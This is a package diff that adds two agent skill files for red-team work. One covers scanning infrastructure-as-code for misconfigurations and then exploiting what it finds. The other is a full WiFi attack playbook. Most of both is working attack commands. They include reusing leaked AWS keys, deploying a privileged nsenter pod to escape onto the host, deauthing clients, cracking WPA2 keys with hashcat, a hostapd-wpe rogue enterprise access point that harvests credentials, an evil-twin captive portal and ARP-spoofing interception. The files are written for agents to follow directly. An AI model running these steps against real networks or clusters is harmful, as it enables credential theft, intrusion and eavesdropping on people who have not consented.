rtexit-method 0.1.16 → 0.1.18

package/packaged-assets/.agents/skills/rt-iac-misconfig/SKILL.md

@@ -0,0 +1,250 @@
+---
+name: rt-iac-misconfig
+description: "Infrastructure-as-Code (IaC) misconfiguration testing — Terraform, Kubernetes YAML, CloudFormation, Helm, Ansible, Docker Compose. Find hardcoded secrets, overprivileged IAM roles, public buckets, unencrypted storage, insecure network policies. Tools: checkov, tfsec, trivy, kube-score, semgrep. Critical for cloud and DevSecOps engagements. Docker: rtexit/kali:v3.0."
+---
+
+> 🐳 **Docker Environment (Recommended):** `docker exec -it rtexit-kali bash`
+
+# rt-iac-misconfig — Infrastructure-as-Code Security Testing
+
+## Overview
+
+Modern infrastructure is defined as code — and that code has security vulnerabilities. IaC misconfigurations cause the majority of cloud breaches: publicly accessible S3 buckets, overprivileged IAM roles, and unencrypted databases are all defined in code before they become breaches.
+
+**When to use:**
+- Cloud engagement with access to IaC repositories
+- DevSecOps assessment
+- After gaining code repository access (GitHub recon → IaC files)
+- Before testing cloud resources — understand how they're configured
+
+---
+
+## Phase 1: Find IaC Files in Target Repos
+
+```bash
+docker exec rtexit-kali bash -c "
+# Search GitHub for IaC files
+ORG=target-company
+TOKEN=YOUR_GITHUB_TOKEN
+
+# Terraform files
+curl -s 'https://api.github.com/search/code?q=org:'\$ORG'+extension:tf+provider' \
+  -H 'Authorization: token '\$TOKEN | \
+  python3 -c 'import json,sys; [print(i[\"repository\"][\"full_name\"], i[\"path\"]) for i in json.load(sys.stdin).get(\"items\",[])]'
+
+# CloudFormation
+curl -s 'https://api.github.com/search/code?q=org:'\$ORG'+AWSTemplateFormatVersion' \
+  -H 'Authorization: token '\$TOKEN | \
+  python3 -c 'import json,sys; [print(i[\"repository\"][\"full_name\"], i[\"path\"]) for i in json.load(sys.stdin).get(\"items\",[])]'
+
+# K8s manifests
+curl -s 'https://api.github.com/search/code?q=org:'\$ORG'+apiVersion+kind:+Deployment+path:k8s' \
+  -H 'Authorization: token '\$TOKEN | \
+  python3 -c 'import json,sys; [print(i[\"repository\"][\"full_name\"], i[\"path\"]) for i in json.load(sys.stdin).get(\"items\",[])]'
+"
+```
+
+---
+
+## Phase 2: checkov — Comprehensive IaC Scanner
+
+```bash
+docker exec rtexit-kali bash -c "
+# Clone target IaC repo
+git clone https://github.com/target/infrastructure /tmp/infra/
+
+# Scan Terraform
+checkov -d /tmp/infra/terraform/ \
+  --framework terraform \
+  --output cli \
+  --compact \
+  2>/dev/null
+
+# Scan Kubernetes manifests
+checkov -d /tmp/infra/k8s/ \
+  --framework kubernetes \
+  --output json > /tmp/k8s_findings.json
+
+# Scan CloudFormation
+checkov -d /tmp/infra/cloudformation/ \
+  --framework cloudformation \
+  --output cli
+
+# Scan everything
+checkov -d /tmp/infra/ --output json > /tmp/checkov_all.json
+
+# Extract HIGH severity findings
+cat /tmp/checkov_all.json | python3 -c \"
+import json, sys
+r = json.load(sys.stdin)
+for result in r.get('results', {}).get('failed_checks', []):
+    print(f'[FAIL] {result[\\\"check_id\\\"]}: {result[\\\"check\\\"][\\\"name\\\"]}')
+    print(f'  File: {result[\\\"repo_file_path\\\"]}:{result[\\\"file_line_range\\\"]}')
+\"
+"
+```
+
+---
+
+## Phase 3: Hardcoded Secrets in IaC
+
+```bash
+docker exec rtexit-kali bash -c "
+IaC_DIR=/tmp/infra
+
+# gitleaks on IaC repo
+gitleaks detect --source \$IaC_DIR --no-banner --report-format json \
+  --report-path /tmp/iac_secrets.json 2>/dev/null
+
+# trufflehog on cloned repo
+trufflehog git file://\${IaC_DIR} --json 2>/dev/null | head -50
+
+# Manual grep patterns
+echo '=== AWS Keys in IaC ==='
+grep -r 'AKIA[0-9A-Z]\{16\}' \$IaC_DIR --include='*.tf' --include='*.yaml' --include='*.yml' --include='*.json'
+
+echo '=== Hardcoded passwords ==='
+grep -rE '(password|secret|token)\s*=\s*\"[^\"]{6,}\"' \$IaC_DIR \
+  --include='*.tf' --include='*.yaml' --include='*.yml'
+
+echo '=== Database connection strings ==='
+grep -rE 'jdbc:|mongodb\+srv:|postgresql://|mysql://' \$IaC_DIR \
+  --include='*.tf' --include='*.yaml' --include='*.yml' --include='*.env'
+
+echo '=== Private keys ==='
+grep -r 'BEGIN.*PRIVATE KEY\|BEGIN RSA\|BEGIN EC' \$IaC_DIR -l
+"
+```
+
+---
+
+## Phase 4: Terraform — IAM & Security Issues
+
+```bash
+docker exec rtexit-kali bash -c "
+IaC_DIR=/tmp/infra/terraform
+
+echo '=== Overprivileged IAM policies ==='
+grep -r '\"*\"\|Action.*\*\|Resource.*\*' \$IaC_DIR --include='*.tf' -A2
+
+echo '=== Public S3 buckets ==='
+grep -r 'acl.*=.*\"public\|block_public_acls.*false\|ignore_public_acls.*false' \$IaC_DIR --include='*.tf' -B2
+
+echo '=== Unencrypted storage ==='
+grep -r 'encrypted.*=.*false\|encryption.*=.*\"none\"' \$IaC_DIR --include='*.tf' -B2
+
+echo '=== Security groups wide open ==='
+grep -r 'cidr_blocks.*0\.0\.0\.0/0\|ipv6_cidr.*::/0' \$IaC_DIR --include='*.tf' -B5
+
+echo '=== S3 versioning disabled ==='
+grep -r 'versioning' \$IaC_DIR --include='*.tf' -A3 | grep -v 'enabled.*true'
+
+echo '=== CloudTrail disabled ==='
+grep -r 'enable_logging.*false\|is_multi_region_trail.*false' \$IaC_DIR --include='*.tf' -B2
+"
+```
+
+---
+
+## Phase 5: Kubernetes — RBAC & Pod Security
+
+```bash
+docker exec rtexit-kali bash -c "
+K8S_DIR=/tmp/infra/k8s
+
+echo '=== Privileged containers ==='
+grep -r 'privileged: true' \$K8S_DIR --include='*.yaml' --include='*.yml' -B5
+
+echo '=== hostNetwork / hostPID / hostIPC ==='
+grep -r 'hostNetwork: true\|hostPID: true\|hostIPC: true' \$K8S_DIR --include='*.yaml' -B5
+
+echo '=== runAsRoot ==='
+grep -r 'runAsUser: 0\|runAsNonRoot: false' \$K8S_DIR --include='*.yaml' -B5
+
+echo '=== AllowPrivilegeEscalation ==='
+grep -r 'allowPrivilegeEscalation: true' \$K8S_DIR --include='*.yaml' -B5
+
+echo '=== Hardcoded secrets in env vars ==='
+grep -rE 'value: \"[A-Za-z0-9+/]{20,}\"' \$K8S_DIR --include='*.yaml' -B3
+
+echo '=== RBAC * permissions ==='
+grep -r 'verbs:.*\\\"\*\\\"\\|resources:.*\\\"\*\\\"' \$K8S_DIR --include='*.yaml' -B5
+
+echo '=== Exposed NodePort/LoadBalancer ==='
+grep -r 'type: NodePort\|type: LoadBalancer' \$K8S_DIR --include='*.yaml' -B10 | grep -E 'name:|type:|port:'
+"
+```
+
+---
+
+## Phase 6: trivy — IaC + Container Vulnerability Scan
+
+```bash
+docker exec rtexit-kali bash -c "
+# Scan IaC directory
+trivy config /tmp/infra/ \
+  --format table \
+  --exit-code 0 \
+  --severity HIGH,CRITICAL
+
+# Scan Dockerfile
+trivy config /tmp/infra/Dockerfile
+
+# Scan Helm chart
+trivy config /tmp/infra/helm/
+
+# Scan K8s manifests
+trivy k8s --report summary /tmp/infra/k8s/
+"
+```
+
+---
+
+## Phase 7: Exploit Found Misconfigs
+
+```bash
+docker exec rtexit-kali bash -c "
+# Example: Found public S3 bucket in Terraform
+# → check if bucket is actually public
+s3scanner scan --bucket target-company-backups
+
+# Found AWS credentials in .tf file
+# → use them
+aws configure set aws_access_key_id FOUND_KEY
+aws configure set aws_secret_access_key FOUND_SECRET
+aws sts get-caller-identity
+aws iam list-attached-user-policies --user-name \$(aws iam get-user | python3 -c 'import json,sys; print(json.load(sys.stdin)[\"User\"][\"UserName\"])')
+
+# Found K8s config with privileged pod
+# → deploy escape pod
+kubectl apply -f - << 'EOF'
+apiVersion: v1
+kind: Pod
+metadata:
+  name: escape
+spec:
+  hostPID: true
+  hostNetwork: true
+  containers:
+  - name: escape
+    image: alpine
+    command: ['nsenter', '--target', '1', '--mount', '--uts', '--ipc', '--net', '--pid', '--', 'bash']
+    securityContext:
+      privileged: true
+EOF
+"
+```
+
+---
+
+## Related Skills
+- `rt-exploit-cloud-aws` — exploit found AWS misconfigs
+- `rt-kubernetes` — exploit K8s RBAC issues
+- `rt-github-recon` — find IaC repos first
+- `rt-supply-chain` — IaC pipeline security
+- `rt-exploit-containers` — container escape after finding privileged pods
+
+## References
+- https://www.checkov.io/
+- https://aquasecurity.github.io/trivy/
+- https://attack.mitre.org/techniques/T1580/ — Cloud Infrastructure Discovery

package/packaged-assets/.agents/skills/rt-wifi-attacks/SKILL.md

@@ -0,0 +1,273 @@
+---
+name: rt-wifi-attacks
+description: "Advanced WiFi penetration testing — WPA2 PMKID capture (clientless), Evil Twin / WPA Enterprise downgrade (hostapd-wpe), KRACK attack, WPS brute force, deauth attacks, rogue AP with credential capture, enterprise 802.1X PEAP downgrade. Tools: wifite2, aircrack-ng, hcxdumptool, hcxtools, hostapd-wpe, bettercap. For physical red team engagements requiring wireless access."
+---
+
+> 🐳 **Docker Environment (Recommended):** `docker exec -it rtexit-kali bash`
+> ⚠️ **Requires:** WiFi adapter with monitor mode (e.g., Alfa AWUS036ACH) passed to Docker via `--device` or USB passthrough
+
+# rt-wifi-attacks — Professional WiFi Penetration Testing
+
+## Overview
+
+WiFi attacks remain highly effective for physical red team engagements — bypass perimeter security by capturing credentials on the parking lot, or setup a rogue AP at client offices to capture enterprise creds.
+
+**When to use:**
+- Physical red team engagement requiring network access
+- Testing wireless security of corporate WiFi
+- Demonstrating WPA2-Enterprise credential theft
+- Testing guest WiFi isolation
+
+---
+
+## Setup — WiFi Adapter in Docker
+
+```bash
+# Check available WiFi interfaces on host
+ip link show | grep wlan
+iwconfig
+
+# Pass adapter to Docker
+docker run -it --privileged \
+  --net=host \
+  --device=/dev/bus/usb \
+  rtexit/kali:v3.0
+
+# Or with specific interface
+docker exec rtexit-kali bash -c "
+  airmon-ng start wlan0
+  iwconfig wlan0mon
+"
+```
+
+---
+
+## Phase 1: Survey & Reconnaissance
+
+```bash
+docker exec rtexit-kali bash -c "
+# Enable monitor mode
+airmon-ng check kill
+airmon-ng start wlan0
+
+# Scan all networks
+airodump-ng wlan0mon
+
+# Capture specific BSSID (2.4GHz + 5GHz)
+airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /tmp/capture wlan0mon
+
+# Also use bettercap for passive scan
+bettercap -iface wlan0mon -eval 'wifi.recon on; sleep 30; wifi.show'
+"
+```
+
+---
+
+## Phase 2: WPA2 PMKID Attack (No Clients Needed)
+
+```bash
+docker exec rtexit-kali bash -c "
+# PMKID attack — capture handshake without deauth, no clients needed
+# Step 1: Capture PMKID with hcxdumptool
+hcxdumptool -i wlan0mon \
+  --enable_status=1 \
+  -o /tmp/pmkid_capture.pcapng \
+  --filtermode=2 \
+  --filterlist_ap=/tmp/target_bssids.txt &
+sleep 60
+kill %1
+
+# Step 2: Convert to hashcat format
+hcxpcapngtool -o /tmp/pmkid.hash /tmp/pmkid_capture.pcapng
+
+# Step 3: Crack with hashcat (mode 22000 = WPA2)
+hashcat -a 0 -m 22000 /tmp/pmkid.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt \
+  --force --status
+
+# Step 4: Rule-based attack
+hashcat -a 0 -m 22000 /tmp/pmkid.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt \
+  -r /opt/hashcat/rules/best64.rule --force
+"
+```
+
+---
+
+## Phase 3: WPA2 4-Way Handshake (Traditional)
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET_BSSID=AA:BB:CC:DD:EE:FF
+TARGET_CHANNEL=6
+
+# Step 1: Start capture
+airodump-ng -c \$TARGET_CHANNEL --bssid \$TARGET_BSSID -w /tmp/handshake wlan0mon &
+
+# Step 2: Deauth a client to force handshake
+aireplay-ng --deauth 10 -a \$TARGET_BSSID wlan0mon
+sleep 5
+
+# Step 3: Verify capture has handshake
+aircrack-ng /tmp/handshake*.cap | grep 'handshake'
+
+# Step 4: Convert + crack
+hcxpcapngtool -o /tmp/handshake.hash /tmp/handshake*.cap
+hashcat -a 0 -m 22000 /tmp/handshake.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --force
+
+# Step 5: Wordlist generation from SSID (CUPP + cewl)
+cupp -i  # interactive — enter target org info
+cewl https://target.com -m 8 -d 2 > /tmp/target_words.txt
+hashcat -a 0 -m 22000 /tmp/handshake.hash /tmp/target_words.txt --force
+"
+```
+
+---
+
+## Phase 4: WPA2-Enterprise PEAP Downgrade (EAP Harvest)
+
+```bash
+# Capture domain\username + NTLM hash from enterprise WiFi clients
+# Uses hostapd-wpe to intercept MSCHAPv2 challenge-response
+
+docker exec rtexit-kali bash -c "
+# Check if target uses WPA2-Enterprise
+airodump-ng wlan0mon | grep 'WPA2.*EAP\|MGT'
+
+# Set up rogue Enterprise AP
+# 1. Create hostapd-wpe config
+cat > /tmp/hostapd-wpe.conf << 'EOF'
+interface=wlan0
+driver=nl80211
+ssid=CORPORATE-WIFI
+channel=6
+hw_mode=g
+ieee8021x=1
+eap_server=1
+eapol_key_index_workaround=0
+eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
+ca_cert=/etc/hostapd-wpe/certs/ca.pem
+server_cert=/etc/hostapd-wpe/certs/server.pem
+private_key=/etc/hostapd-wpe/certs/server.key
+private_key_passwd=whatever
+dh_file=/etc/hostapd-wpe/certs/dh
+auth_algs=3
+wpa=2
+wpa_key_mgmt=WPA-EAP
+wpa_pairwise=CCMP TKIP
+rsn_pairwise=CCMP
+EOF
+
+# 2. Launch rogue AP + deauth clients from real AP
+hostapd-wpe /tmp/hostapd-wpe.conf &
+
+# Deauth from real Enterprise AP
+aireplay-ng --deauth 5 -a REAL_AP_BSSID wlan0mon
+
+# Captured creds appear in /var/log/hostapd-wpe.log
+tail -f /var/log/hostapd-wpe.log | grep -i 'username\|password\|response'
+"
+```
+
+```bash
+docker exec rtexit-kali bash -c "
+# Crack captured NTLM challenge-response
+# Format: username:domain:challenge:response
+# Use asleap or hashcat mode 5500 (MSCHAPv2)
+
+# asleap method
+asleap -C CHALLENGE_HEX -R RESPONSE_HEX -W /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
+
+# hashcat method (mode 5500 = NTLMv1, mode 5600 = NTLMv2)
+echo 'USER:DOMAIN:CHALLENGE:RESPONSE' | hashcat -a 0 -m 5600 - rockyou.txt --force
+"
+```
+
+---
+
+## Phase 5: Evil Twin — WPA2 Personal Credential Phishing
+
+```bash
+docker exec rtexit-kali bash -c "
+# Create fake AP with captive portal asking for WiFi password
+TARGET_SSID='CorpGuest'
+
+# Method: airbase-ng + DNSmasq + Apache captive portal
+airbase-ng -e '\$TARGET_SSID' -c 6 wlan0mon &
+
+# Configure DHCP
+cat > /tmp/dnsmasq.conf << 'EOF'
+interface=at0
+dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h
+dhcp-option=3,10.0.0.1
+dhcp-option=6,10.0.0.1
+server=8.8.8.8
+log-queries
+log-dhcp
+address=/#/10.0.0.1
+EOF
+
+ifconfig at0 10.0.0.1 netmask 255.255.255.0
+dnsmasq -C /tmp/dnsmasq.conf
+
+# Captive portal page to harvest PSK
+# Serve a fake 'WiFi login' page on Apache
+# When victim enters PSK → test against handshake capture → if match: real password
+"
+```
+
+---
+
+## Phase 6: wifite2 — Automated All-in-One
+
+```bash
+docker exec rtexit-kali bash -c "
+# wifite2 automates everything: capture + deauth + crack
+
+# Attack all visible networks
+wifite --wpa --pmkid --dict /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
+
+# Attack specific target
+wifite -e 'CORP-WIFI' --pmkid --dict /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
+
+# WPS attack on vulnerable APs
+wifite --wps-only --no-wpa
+"
+```
+
+---
+
+## Phase 7: Post-Compromise — Traffic Analysis
+
+```bash
+docker exec rtexit-kali bash -c "
+# After cracking WPA2 key — capture all traffic
+# Connect to network then:
+
+# ARP poisoning → MITM all traffic
+bettercap -iface wlan0 -eval '
+  net.probe on
+  sleep 5
+  net.show
+  set arp.spoof.targets 192.168.1.0/24
+  arp.spoof on
+  net.sniff on
+'
+
+# Capture credentials from HTTP
+tcpdump -i wlan0 -w /tmp/wifi_capture.pcap &
+# After capture:
+# PCredz -f /tmp/wifi_capture.pcap
+"
+```
+
+---
+
+## Related Skills
+- `rt-exploit-network` — post-WiFi network exploitation
+- `rt-ssl-mitm` — intercept HTTPS after WiFi access
+- `rt-exploit-physical` — physical access scenarios
+- `rt-redteam-infra` — set up C2 after WiFi access
+
+## References
+- https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
+- https://github.com/ZerBea/hcxdumptool
+- https://attack.mitre.org/techniques/T1465/ — Rogue Wireless Access Point